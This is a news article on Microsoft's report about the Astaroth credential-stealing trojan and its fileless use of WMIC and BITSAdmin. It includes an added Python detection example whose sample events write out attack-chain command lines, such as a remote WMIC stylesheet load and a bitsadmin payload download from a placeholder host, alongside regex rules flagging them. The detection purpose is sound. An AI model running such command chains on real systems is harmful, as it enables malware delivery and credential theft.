What is the “Great Duke of Hell” Malware?

Researchers with the Microsoft Defender Advanced Threat Protection Research Team have warned Windows users about the very real threat of a credential-stealing malware known as the “Duke of Hell.” The malware is so dangerous because it hides in plain sight, like an invisible man, by running only completely legitimate system tools within its attack chain. The computer doesn’t know anything is wrong.

The trojan is called the Astaroth Trojan – named after the biblical “Great Duke of Hell”. The virus includes clipboard monitoring and keylogging to steal login information. The malware has become infamous because of how it exploits “living off the land binaries” (LOLBins) to do this. In the newly published report from Microsoft, the Windows Management Instrumentation Command-line (WMIC) tool is the LOLBin identified as being exploited.

Andrea Lelli, who is part of the Microsoft Defender ATP Research Team and who authored the report, said that victims would still need to click on malicious links to trigger the attack chain through a file running an obfuscated batch file. This batch file will trigger the legitimate WMIC system tool to trigger an obfuscated JavaScript file.

This is where it gets a bit complicated, with more obfuscated JavaScript code and more legitimate system tools. The most important part of the attack chain is the Background Intelligent Transfer Service (BITS) admin tool, BITSAdmin, which is used to download further payloads of the virus. These fileless attacks, as they are called, process the malicious payloads “directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk,” Lelli explains.
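The chain described above (a batch file run from a shell, WMIC pulling a script, BITSAdmin fetching payloads) is exactly what a defender can look for in process-creation telemetry: each step is a legitimate binary, but the lineage is not. The following is an added example, not code from the article or from Microsoft; the events, the executable names and the command-line patterns are constructed assumptions modelled on the chain the report describes.

```python
"""Toy lineage-based detection for the LOLBin chain: cmd/batch -> wmic -> bitsadmin."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name, lower-case
    cmdline: str


# Constructed sample events, modelled on process-creation telemetry (not real Astaroth data).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "cmd.exe", 'cmd.exe /c "C:\\Users\\u\\Downloads\\invoice.bat"'),
    ProcEvent(300, 200, "wmic.exe", 'wmic.exe os get /format:"https://example.invalid/s.xsl"'),
    ProcEvent(400, 300, "bitsadmin.exe",
              "bitsadmin.exe /transfer job /download https://example.invalid/p.bin C:\\Users\\Public\\p.bin"),
    ProcEvent(500, 100, "wmic.exe", "wmic.exe os get caption"),   # benign admin use, must not fire
]

# Each rule: (name, regex on image, regex on command line). One rule alone is weak;
# several distinct rules in the same process lineage is the signal.
RULES = [
    ("wmic_remote_format", r"^wmic\.exe$", r"/format:\s*\"?https?://"),
    ("bitsadmin_download", r"^bitsadmin\.exe$", r"/(transfer|download)\b"),
    ("batch_from_shell", r"^cmd\.exe$", r"\.bat\b"),
]


def rule_hits(ev):
    return [name for name, img, cmd in RULES
            if re.search(img, ev.image) and re.search(cmd, ev.cmdline, re.I)]


def ancestors(ev, by_pid):
    chain, cur = [], ev
    while cur.ppid in by_pid:        # walk up until the parent is unknown
        cur = by_pid[cur.ppid]
        chain.append(cur)
    return chain


def score_chains(events, min_hits=2):
    """Return {pid: sorted rule names} for processes whose lineage fires >= min_hits distinct rules."""
    by_pid = {e.pid: e for e in events}
    flagged = {}
    for ev in events:
        hits = set(rule_hits(ev))
        for anc in ancestors(ev, by_pid):
            hits.update(rule_hits(anc))
        if len(hits) >= min_hits:
            flagged[ev.pid] = sorted(hits)
    return flagged
```

The benign WMIC query (pid 500) never fires because it has neither a remote stylesheet nor suspicious ancestry, while the BITSAdmin download (pid 400) inherits the hits of its whole lineage.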

Eli Salem, a security researcher with Cybereason who uncovered a previous Astaroth attack, said the attacks are difficult to detect as “the full process of the deployment and execution of the malware” is done through Windows LOLBins. The attacks seem like perfectly legitimate Windows activity to the average user because they are being done by legitimate Windows processes.

However, Lelli explained that “using invisible techniques and being actually invisible are two different things.” Because some of the techniques are so anomalous, Microsoft Defender ATP, the commercial counterpart of the Microsoft Defender Antivirus that ships with Windows 10 free of charge, is able to identify Astaroth attacks.

If you aren’t using Windows Defender ATP, then Salem advises that Windows users take care when “opening anonymous or new .lnk and .zip files that come from suspicious email attachments.” Another warning comes from Kevin Reed, CISO of Acronis. Reed says that the fileless malware is an efficient technique that passes by many current anti-malware products without being detected. He says that users should “choose a solution that employs advanced malware detection techniques such as memory scanning, stack trace analysis, and system cell-based directions.” These techniques will expose any malware hiding in the PC memory.

This is not the first time that the Astaroth malware has hit, and doubtless it will not be the last. As long as you stay careful out there, though, you should be okay.

Reactionary Times News Desk